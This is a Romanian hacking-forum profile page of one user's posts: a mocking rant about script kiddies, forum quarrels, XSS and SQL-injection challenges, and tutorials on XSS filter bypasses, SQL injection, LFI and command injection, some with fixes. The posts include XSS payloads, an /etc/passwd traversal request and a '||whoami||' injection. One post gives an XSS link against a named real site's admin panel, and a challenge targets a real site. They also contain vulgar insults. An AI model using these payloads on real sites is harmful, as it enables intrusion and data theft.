-
Posts
94 -
Joined
-
Last visited
Posts posted by Corex
-
-
Salut , am fost inactiv o buna perioada in care mi-am imbogatit cunostintele si studiind persoanele din jurul meu am constatat ca exista persoane proaste , si persoane extrem de proaste , ca sa deschid putin ochii utilizatorilor o sa descriu putin persoanele rau intentionate "anonymousii" din ziua de astazi.
De regula acesti "anonymousi" stau foarte ascunsi de ochii nostri , ii gasim mereu pe skype / messenger cu statusuri de genul "Dau net cu lingurita fraierilor" si mereu o sa ii vezi cu nume gen: "Pustiu" "Doxu" "Renko" "SZR" cand ii vezi online cel mai inteligent ar fi sa dai tu logout !
Dar daca esti in conferinta cu ei si fereasca Dumnezeu i-ai injurat dragi cititori am sa va spun ca o sa regretati toata viata deoarece acesti hackeri stiu injuraturi precum stiu preotii rugaciuni si este imposibil sa ii intreci s-au sa le dai un maxim.
De obicei acesti "anonymousi" se "ard" intre ei de "root-uri" si sunt fericiti multe zile in sir daca au reusit sa te pice.
Dupa ce ti-a "picat netul" nu fi surprins daca atunci cand intri o sa ii gasesti cu statusul "Lam pikat p fraer" nici gramatica nu este iertata de ei , si o reactualizeaza in limba lor.
In timpul liber "anonymousii" stau cu ochii pe site-ul porntube.com (si ca sa ii oftice vine alt anonymous si da cu flood-ul in redtube si ii lasa pe ceilalti cu sagetica in mana si cu treaba neterminata)
Lor le place foarte mult sa aiba foarte multe femei in jurul lor , asa de mult incat la nevoie si ei sunt fetite in cazul in care au nevoie de ceva de la alt cineva.
Lor le place foarte mult sa "combine" fete si sa le dezbrace dupa care sa le santajeze (sau cei mai inteligenti sunt constienti ca au material de laba cateva luni bune cu pozele obtinute in 3 minute)
Cei mai multi dintre ei au obtiune "change sex" din nastere deoarece vorbeste cu tine pe skype ca si baiat , si pe mess vorbeste cu gagigasu care evident are ceva ce domnul are nevoie.
Cea mai mare pedeapsa care i-ar putea lovi ar fi sa se interzica filmele porno s-au sa nu mai aiba maini
In fine nu ma priveste pe mine aceste doua aspecte din viata lor.
Mai nou umbla in echipa si au foarte multi membri si daca te pui cu ei , te pui cu anonymous Romania
Sincer sa fiu la cat am intalnit ar insemna ca 20% din populatia Romaniei care foloseste calculatorul si are abilitati de hacking sunt din "Anonymous"
Iubitele lor sa nu credeti ca sunt doar niste simple fete care cauta atentie ci sunt niste spioni infiltrati de rivalii acestui anonymous cu urmatorul plan
" se duce fata la el , il excita , si el cand se pregateste sa frece lampa noi ii picam netul asa fraierul o sa ramana cu niste coaie cat casa"
Cam asta este nivelul lor de gandire si de logica.
Mai sunt un fenomen pe internet noi o sa ii numim "team crackerasi" aceasta denumire am puso deoarece cunosc o comunitate foarte interesanta care ii nu o sa ii dau numele deoarece simpla accesare a site-ului respectiv va infectati cu prostie.
Acesti indivizi ii mai putem numi "razbunarea tocilarilor" ataca des serverele de metin2 , si limba romana , daca incerci sa spui ceva ce nu stiu ei si tu esti as , or sa-ti spuna ca nu este adevarat si ca ei stiu ce este cu adevarat acel lucru , drept dovada am incercat si eu sa ma bag cu ei in seama sa ii intreb despre programare si mi-au raspuns ca urmatoarele linii nu sunt vulnerabile xss
$x = $_GET['asd']
echo $x;Deci de aici reiese ca hackerii nu au nevoie de asemenea informatii !
Aceasta revolutie a tocilarilor se trage de la frustrarea stransa ca unii pot construi ceva , si ei nu.
Asa ca toate armele lor sunt urmatoarele
-Proxy-urile indetectabile
-Root-urile de pe care dau flood
-Canalele de MiRC
-Colectia de conturi premium pe diverse site-uri de videochat / porno
-Fetele care sunt oricand in prezenta lui cu textul "da-mi si mie un root"
-Contul pe xat plin ochi cu ajutorul victimelor
Pe langa acestea mereu acest hacker mai are si
- Palmaresul lui cu servere de metin2 sparte
- Palmaresul lui de Radiouri picate
- Lista lui cu "fraeri" care i-ar fi picat in decursul timpului.
Unul din susnumiti are numele pe internet "Huiu aka Mashat" haide sa il prezint in cate-va cuvinte pe acest domn.
Este in actiune de cati-va ani , este respectat doar de copii de sub 15 ani si armata lui de elita sunt niste persoane de temut cu care nu ai vrea sa ai afaceri nici odata.
Aici vorbim despre
- DDoS2015
- Cromas
- PenTest
- ScrY.dll
- © FuNcKer
- R00t1ng
Acesti oameni sunt foarte buni cand vine vorba de "DDo$" si stiu cam toate filmele porno existente la momentul actual , si ultima lor gagica in realitate au avuto la gradinita.
Viata lor sexuala merge foarte bine , din motivul acesta ei nu au tinut pasul cu ea.
Au avut foarte multe relatii pe internet , din care putine relatii au fost cu fete.
Nu invata sa faca sql injection s-au alte metode de exploatare deoarece exista programe care fac asta.
Daca spargi 10.000 de siteuri intr-o zi si tu nu ai auzit nici odata de ele , atunci esti hacker roman.
-
-
Challenge Closed
Orice PM / REPLAY nu se mai ia in considerare.
-
Challenge Closed
Orice PM / REPLAY nu se mai ia in considerare.
-
Eu am votat orange deoarece am avut o experienta destul de interesanta cu el
Aveam semnal si in padure si la munte si cand treceam granita mai aveam semnal vro 20 minute este destul de ok si la preturi ... recomand orange cosmote si vodafone pica reteaua si la metrou in fine depinde si ce telefon folosesti am auzit ca telefoanele mai antice au semnalu mai bun daca pentru asta il vrei..
Off zapp mai exista eu nu am vazut pe nicaieri cartele zapp in fine oare ce prefix or avea
076
078 cosmote
072
073 vodafone
074
075 orange
071
077 digi
079 frog
Nu inteleg ce prefix o avea zapp
-
De unde maic? "raported" ?
// Po?i s? a?tep?i mult ?i bine dup? r?spuns.
Eu am zis sa fiu bun samaritean ... poate primesc ceva in schimb , si un HOF ar fi buni , dar vorba lui Cifre mai bine profitati voi de el
http://www.probux.com//adminpanel/?username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=
-
omg, <object data="javascript:alert(2)"> is now 'HARD' .
Check for see it does not work
-
Vulnerability: Cross-site-scripting
Type: Reflected
Name: Corex
Status: Raported
Pictures Profile:
Au trecut 3 zile si inca nici un raspuns , mai astept.
-
On: Imi cer scuze staff-ului pentru ca fac offtopic dar nu ma pot abtine!
OFF : Bai raton constipat ce tot comentezi aiurea la fiecare cuvant pe care il scriu ? Te
simti "penetrat" de vorbele mele sau ce?Deci draga Durex sau cum te numesti eu zic sa nu mai intri pe RST ca nu e de tine , apuca-te de metin , cur-spurcat(cs) si alte rahaturi !
In sfarsit ma simnt si eu bine si vine cineva sa imi strice dispozitia , nu stiu daca ai observat dar imi argumentez fiecare vorba care o scot pe gura , si ma gandesc la ea de 10 ori inainte , ceea ce in cazul tau nu este nevoie sa ma fi gandit prea mult deoarece se vede clar ce fel de persoana esti tu.
Daca vii pe privat si ma injuri nu rezolvi nimic , totul este sa fii pe bune pe cel care este pe bune cu tine !
Te-ai enervat ca ti-am dat replay la o chestie unde te-ai demigrat tu singur in ochii mei cel putin , te-ai luat de bietul baiat degeaba , el s-a prezentat nu stiu daca este dreptul vostru sa va luati de el ... de ce ati faceo ? in fine nu mai comentez absolut nimic deoarece mereu cand vad asemenea oameni ma doare burta ! si nu ca sunt constipat cum spuneai tu , si nu ca sunt "raton" doar ca sunt socat de comportamentul vostru si cum puteti voi sa ganditi o problema injurand si "urand" toata lumea nu este cea mai buna obtiune pe care o puteai aborda.
Mediteaza la ce ti-am scris eu aici si ai sa observi ca nu sunt asa de "raton" cum spuneai tu
-
Ba, ce calange ?
Si de ce ai mai pus target "aHR0cDovL3doaXRlLWhhY2tlcnMuY29tL2NoYWxsYW5nZS94c3MtY2hhbGxhbmdlLWhhcmQucGhw" cand se vede in status bar la browserul tau de unde citeste.
se vede domeniu nu si locatia
-
Easy dude.
Astept si vectorul folosit de tine !
-
Am observat ca nu punesem target-ul dar am editat.
-
un target ne dai
Ai acolo
Target:
aHR0cDovL3doaXRlLWhhY2tlcnMuY29tL2NoYWxsYW5nZS94c3MtY2hhbGxhbmdlLWhhcmQucGhw
-
Target:
aHR0cDovL3doaXRlLWhhY2tlcnMuY29tL2NoYWxsYW5nZS94c3MtY2hhbGxhbmdlLWhhcmQucGhw
Prof:
Difficulty: Hard
Ruls: Fara HINT-uri , postati o poza cu alerta si astept pe PM vectorul folosit de voi.
Castigatori
1) Renegade
2) valcea55
3) florin_darck
4) danyweb09
5) whitec0der
-
De cand iti permiti sa spui ca proiectul a fost realizat de Reckon si de "Corex" adica de tine? Reckon nu ti-a dat voie sa faci asa ceva, el nu a lucrat cu tine la asa ceva, ar trebuii sa fi prea nesimtit sa scrii asta.
XPACH SQL Injection E XPATH nu XPACH, vai de coaiele tale.
Partea XSS este facuta de mine ! partea SQLI este facuta de el.
-
Greseli gramaticale fara numar pe prima pagina.
Am sa corectez , am facut descrierea in graba .
-
Cuvant inainte
Initiatorul proiectului este Reckon cu site-ul lui pentest-academy.com
Dupa ce s-a inchis site-ul lui a facut publice scripturile si am spus sa il redeschid eu din nou
Nu a publicat partea de XSS deci a trebuit sa o refac eu de la 0 desi inca nu este in totalitate gata m-am gandit
Ca este folositor si cat am lucrat si sa o updatez pe parcurs ce termin cate un nivel nou.
Ce etape trebuie sa treci la SQL injection
La SQL injection aveti 4 nivele de cursuri cu 4 examene
Dupa fiecare lectie terminata aveti cate un examen ,
la terminarea examenului veti fi trecuti in HOF la categoria unde ati absolvit examenul
Ce etape trebuie sa treci la Cross Site Scripting
La Cross Site Scripting tot aveti 4 etape deocam data nu avem examene
Dar le voi adauga pe parcurs , aici veti invata metode de a trece de Filtre
Cum ar arata codul in spate si cum se recunoaste un XSS
CURSURI SQL INJECTION
SQL INJECTION NIVEL 1 UNION BASED
SQL INJECTION NIVEL 2 ERROR BASED
SQL INJECTION NIVEL 3 DOUBLE QUERY
SQL INJECTION NIVEL 4 XPATH INJECTION
CURSURI XSS (CROSS SITE SCRIPTING)
XSS (CROSS SITE SCRIPTING) LEVEL 1
XSS (CROSS SITE SCRIPTING) LEVEL 2
XSS (CROSS SITE SCRIPTING) LEVEL 3
XSS (CROSS SITE SCRIPTING) LEVEL 4
©©©©©©©©©©©©©©©©©©©©©©©©©©
©©©Proiect realizat de Reckon & Corex©©©©©©
©©©©©©©©©©©©©©©©©©©©©©©©©©
- 1
-
In acest tutorial va voi arata 4 tipuri de bypasuri XSS si cam cum arata scriptul in spate.
Sa inepem !
Fara Filtru.
Varianta fara filtru nu prea iti da batai de cap deoarece se introduce direct vectorul <script>alert(/xss/)</script>
Cum apare acest tip de xss? Pur si simplu afiseaza toate informatiile care sunt trecute prin GET
codu din spate arata cam asa
<?php
$functie =($_GET ['xss']);
echo ("$functie ")
?>Ca sa afisezi alerta XSS vei face asa
www.white-hackers.com/xss1.php?xss=<script>alert(2)</script>
Bypass basic folosinduse de filtrul str_replace()
Aceasta functie cauta un sir specificat (in cazul nostru) <script> si il modifica (in cazul nostru NULL)
Haide sa vedeti si cum arata codu sursa pentru acest tip de XSS
<?php
echo 'Rezultat '.str_replace('script', null, $_GET['xss']);
?>Ca sa treci de acest filtru trebuie sa folosim un bypass (este foarte usor)
www.white-hackers.com/xss2.php?xss=<ScRiPt>alert(2)</ScRiPt>
XSS Filtru htmlentities()
htmlentities converteste toate functiile din HTML . Intr-un cuvant toate tagurile din HTML le traduce in HTML (nu afecteaza codul sursa)
Scriptul din spate o sa arate cam asa
<?php
echo "<img alt='' src='".htmlentities($_GET['xss'])."' />";
?>Ca sa trecem de acest filtru trebuie sa continuam scriptul dar sa includem alerta
acest lucru se va face cam asa
www.white-hackers.com/xss3.php?xss=.' onerror='alert("XSS")
Filtru folosinduse de data URLs
Aceasta metoda este putin mai ciudata deoarece practic vom folosi datele URL care in cele mai multe cazuri sunt folosite pentru imagini pentru a le pastra ca si text intr-un HTML
Haide sa vedem cum arata codul sursa
<?php
echo '<object data="'.htmlspecialchars($_GET['xss']).'"></object>';
?>Ca sa afisam alerta XSS trebuie sa ne folosim de data:text/html;base64
iar dupa vom cripta in base64 vectorul <script>alert(2)</script>
Deci va arata cam asa
www.white-hackers.com/xss4.php?xss=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
- 1
-
Target:
aHR0cDovL3d3dy5tb3JlYW5hcnRzY2VudGVyLm9yZy9uZXdzLnBocD9pZD0yODA1
Method: Union based
---------------------------------------------------------------
Instructions:
-Extrage (versiune , user db , database)
-Numele de pe forum sa fie scri cu verde
-Nu dati HINTURI
-Rezolvarea se trimite pe PM
---------------------------------------------------------------
Prof:
|--------------------------------------------------------------|
|Castigatori
|--------------------------------------------------------------|
|-endru
|-whitec0der
|-Renegade
|-AsalT
|-Sensi
|--------------------------------------------------------------|
-
Wow, mersi pentru tutorial. Îmi par cunoscute câteva exemple. Oare de ce? Ah, da, pentru ca eu l-am scris acum 5 ani. Bine, nu eu am scris c?catul asta, tu doar ai copiat exemplele ?i tips-urile.
http://exploit-db.com/papers/12871
Pe lâng? ca mi-ai copiat exemplele, ai tradus prost, ai mai ?i introdus gre?eli în el. Dac? te ui?i atent po?i sa îmi vezi numele în câteva exemple. )
Penibil.
Doar cateva exemple nu tot si nu de acolo le-am luat.
-
Cel mai bun programator din viata ta? Asta'i sistemu tau de referinta? Trist.
Pentru cei care au inteles ce am vrut sa spun , nu este trist , citeste pana intelegi.
-
Te lauzi intr-un stil retardat de parca ai impresia ca nimeni nu-si da seama de ce incerci sa faci.
...
Nu, iti plac aia care doar se cred.
"Nu imi plac decat..." sau "Imi plac doar...". Nu mai vorbi precum tiganii.
---
Hai sa te aduc un pic cu picoarele pe pamant, Shelo. Esti un nimeni, ai fost un nimeni si, in ritmul asta, vei fi un nimeni. Pune mana si invata ceva, citeste o carte pe orice subiect, doar ca sa mai capeti cunostinte de orice fel, si cel mai probabil iti vei schimba si mentalitatea. In momentul asta esti un copil laudaros care are impresia ca stie ceva cand nu stie nimic. Trei piese dintr-un puzzle de o mie te fac sa pari inteligent in fata a cinci oameni, daca asta e scopul tau, sa fii inteligent in ochii celor mai idioti ca tine, ti l-ai indeplinit deja si te poti si opri, eventual sa mergi sa-ti faci si tu forumul tau. Daca vrei sa devii serios, termina cu laudele astea de cacat si cu foamea de atentie "by any means".
Se pare ca gresesti ..
-
Salutare RST , sunt corex si chiar daca sunt inregistrat de mai mult timp pe aici "nesimtit" fiind din fire am uitat sa ma prezint.
Numele meu il stiu decat prietenii deci nu cred ca ar avea rost sa il fac si public.
Pasionat de informatica de cam 2 ani , pus pe treaba de cam 4 luni nu pot sa spun ca sunt prea stralucit in acest domeniu dar evoluez pe zi ce trece.
Am mai avut un cont inainte pe aici dar am fost banat mai bine sa nu stiti cine am fost
Am intrat pe aceasta comunitate din sete de informatii si stiind ca aici este un mediu a programatorilor acesta este si visul meu daca ii pot spune asa sa fiu cel mai bun programator din viata mea
Pe principiu daca vad pe cineva mai bun ca mine sa il depasesc (sunt luptator din fire)
De obicei sunt tacut , nu vorbesc mult si prost cum fac altii pe aici (cel putin din cati am cunoscut.)
Imi displac oamenii care imi trimit pm-uri gen (cum se face sql injection) stau si ii explic cu ce se mananca dupa care primesc pm (imi faci tu syntaxa te rog ca mie nu imi iese)
Imi plac oamenii care sunt pusi pe treaba si ce nu stiu invata singuri (daca iti dai interesul in ceva o sa reusesti)
Imi displac oamenii care injura mult (credeti ca rezolvati ceva daca injurati?)
Dar imi plac oamenii care sunt calculati si respecta pe cei care iau respectat
Nu imi plac oamenii care spun ca sunt hackeri
Imi plac oamenii care demonstreaza acest lucru
Nu imi plac oamenii
Imi doar femeile
Bine v-am gasit
-
In tutorialul de astazi o sa va vorbesc de cele mai populare vulnerabilitati si exploatarea acestora.
1) XSS (Cross Site Scripting)
2) SQLI (SQL Injection)
3) SCD (Source Code Disclosure)
4) LFI (Local File Inclusion)
5) RCE (Remote Code Execution)
1) XSS (Cross Site Scripting)
Cross site scripting este o vulnerabilitate prin care permite atacatorului sa injecteze coduri HTML / Javascript
Majoritatea atacurile de acest tip tintesc cookie-urile.
-Cum sa imi dau seama ca este vorba de un XSS?
Testarea "parametrului" vulnerabil se face cu un vector de obicei se foloseste un vector cu o alerta
JavaScript
ex:
"><script>alert(2)</script>
Cate tipuri de XSS-uri exista?
Dupa cate stiu eu sunt doua tipuri de XSS
Persistent: sau XSS reflectat care este vulnerabil pe acel parametru dar nu salveaza datele nicaieri
Si "victima" trebuie sa acceseze linkul creat de tine cu Graber
Nepersistent: Acest tip afecteaza toti utilzatorii site-ului deoarece vectorul de xss ramane imprimat in sursa paginii
- De ce apare aceasta vulnerabilitate?
Aceasta vulnerabilitate apare din cauza ca nu sunt filtrate inforatiile are le afiseaza.
Intr-un cuvant le afiseaza direct in codul sursa
exemplu:
<?php
<?php
if(isset($_GET['vulnerabil'])) {
$var=$_GET['vulnerabil'];
print $var;
}
?>
?>Acest script este vulnerabil la XSS! Cum ii facem testul ?
Foarte simplu , sa spunem ca am creeat un fisier xss.php
Si l-am urcat pe www.rstforums.com/xss.php
Vom lucra pe parametru GET deci noi pe parametru GET am pus rstforums
Intram asa
rstforums.com/xss.php?rstforums=(vector)
In realitate o sa arate exact asa
rstforums.com/xss.php?rstforums=<script>alert(2)</script>
Nu voi intra in detalii despre exploatare , acum o sa va dau si solutia de securizare a vulnerabilitatii acestea!
In tutorialul nostru ne vom folosi de functia htmlentities din PHP pentru a ne proteja de acest atac.
<?php
echo htmlentities((stripslashes($_GET['text'])), ENT_QUOTES);
?>Ce face htmlentities? Pur si simplu converteste toate caracterele care se folosesc de aplicatia HTML / JAVASCRIPT
Va las aici si un link cu fel de fel de vectori care ii puteti folosi
XSS Vector Collection - Pastebin.com
2) SQLI (SQL Injection)
Sql injection este o vulnerabilitate care afecteaza in mare parte serverele MYSQL al paginii respective
Cum iti dai seama ca un site este vulnerabil la SQL Injection
Gasirea vulnerabilitatii cand este vorba de SQLI la site-uri
In primul rand se testeaza cu ' daca va fi returnata o eroare de exemplu
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND publ_option = 'Y' LIMIT 0, 1' at line 1
atunci fiti siguri ca va confruntati cu o vulnerabilitate de tip SQL injection
Metodele de exploatare cele mai intalnite sunt
-Union based
-error based
-double query
-Time Based
-PostGree
-Cum apare vulnerabilitatea SQL Injection?
Sa zicem ca avem urmatorul script
<?php
mysql_connect("localhost","user","password");
mysql_select_db("db");
$informatii=($_GET['id']);
$int=mysql_query("SELECT * FROM post WHERE postid='".$informatii."'");
?>Scriptul cauta in baza de date in functie de un anumit ID , pe care utilizatorul il trimite prin GET catre server.
- Cum se repara aceasta vulnerabilitate?
Protejarea site-ului dumneavoastra de aceasta vulnerabilitate se face cu functia mysql_real_escape_string
Deci scriptul dumneavoastra va arata cam asa
<?php
mysql_connect("localhost","user","password");
mysql_select_db("db");
$informatii=mysql_real_escape_string($_GET['id']);
$int=mysql_query("SELECT * FROM post WHERE postid='".$informatii."'");
?>3. SCD (Source Code Disclosure)
SCD-ul este o vulnerabilitate mai periculoasa decat SQL injection deoarece aceasta vulnerabilitate iti permite sa descarci sau sa vezi codul sursa a unei pagini (Partea de PHP)
De cele mai multe ori atacatorul urmareste informatii sensibile care ii aduce accessul site-ului respectiv.
-Cum se testeaza daca parametru este vulnerabil la SCD
In majoritatea cazurilor SCD-ul este gasit in paginile de download.
exemplu avem urmatorul link
www.site.com/download.php?carte=ioncreanga.pdf
Dupa download.php?carte= puneti index.php
Aici sunt doua posiblitati.
Ori il descarca
Ori apare in codu sursa a paginii.
4) LFI (Local File Inclusion)
Cu ajutorul acestei vulnerabilitati atacatorul poate include anumite fisiere critice in server sau poate fi transformat cu success intr-un SCD
- Cum se creaza vulnerabilitatea ?
Avem urmatorul exemplu
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();Variabila “file” nu este securizata.Putem observa in prima linie ca este ceruta prin metoda $_REQUEST.Si continutul fisierului este afisat prin intermediul functiei readfile().Deci putem vedea continutul unui fisier arbitrar. Daca facem urmatoarea cerere :
http://site/download.php?file=../../../../../../etc/passwd
putem citii cu succes fisierul “etc/passwd”.
- Cum se securizeaza?
Metoda simpla : Nu permite caractere speciale in variabile.Filtreaza “.” .
Alta metoda : Filtreaza “/” , “\” si “.” .
5) RCE (Remote Code Execution)
RCE dupa mine este cea mai periculoasa vulnerabilitate web din cate exista si totusi printre cele mai rare
deoarece aceasta vulnerabilitate permite executarea codurilor de tip PHP
Cum apare aceasta vulnerabilitate?
Avem exemplu
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
system ("dig @$ns $host $query_type");Variabila “ns” nu este filtrata si atacatorul poate specifica orice valoare.Un atacator poate folosi orice comanda prin intermediul acestei variabile.Sa facem o cerere :
http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging
Injectia nu va functiona.De ce?Comanda executata va fi “dig whoami sirgod.com NS” si nu va functiona desigur.Sa incercam in alt fel.Avem operatorul OR (||) si il vom folosi pentru a “separa” comenzile.Exemplu :
http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
Comanda noastra va fi executata.Comanda va devenii “dig ||whoami|| sirgod.net NS” .
Cum se securizeaza?
Utilizati functiile escapeshellarg() si escapeshellcmd() .
Cam asta a fost tot daca gasiti in tutorial greseli tehnice / gramatice trimiteti-mi PM cu ele.
Sursa la o bucata de tutorial
Hacerii de 15 ani
in Cosul de gunoi
Posted · Edited by Corex
Citeste de mai multe ori pana intelegi ce am scris si la ce m-am refirit.
Sa ii dau PM lu Nytro cu filme porno , asta este o cerinte de filme porno noi in direct s-au cum ? in fine nu ma priveste pe mine ! o seara placuta.